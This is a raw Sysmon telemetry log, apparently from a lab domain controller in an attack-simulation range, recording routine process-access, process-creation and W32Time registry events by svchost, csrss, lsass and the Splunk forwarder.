10341000x800000000000000029330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53E9-6008-AB06-00000000A301}7416C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-53E9-6008-AB06-00000000A301}7416C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:48.862{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-4982-6008-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000029341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:48.737{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:48.737{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:48.737{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.892{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53FF-6008-AF06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.892{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.892{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.892{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.892{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.892{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-53FF-6008-AF06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.892{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53FF-6008-AF06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.893{7901BC46-53FF-6008-AF06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000029361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000029360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002908e2) 13241300x800000000000000029359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ef3d-0x3832de1a) 13241300x800000000000000029358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ef45-0x99f7461a) 13241300x800000000000000029357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ef4d-0xfbbbae1a) 13241300x800000000000000029356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000029355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002908e2) 13241300x800000000000000029354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ef3d-0x3832de1a) 13241300x800000000000000029353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ef45-0x99f7461a) 13241300x800000000000000029352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:02:07.627{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ef4d-0xfbbbae1a) 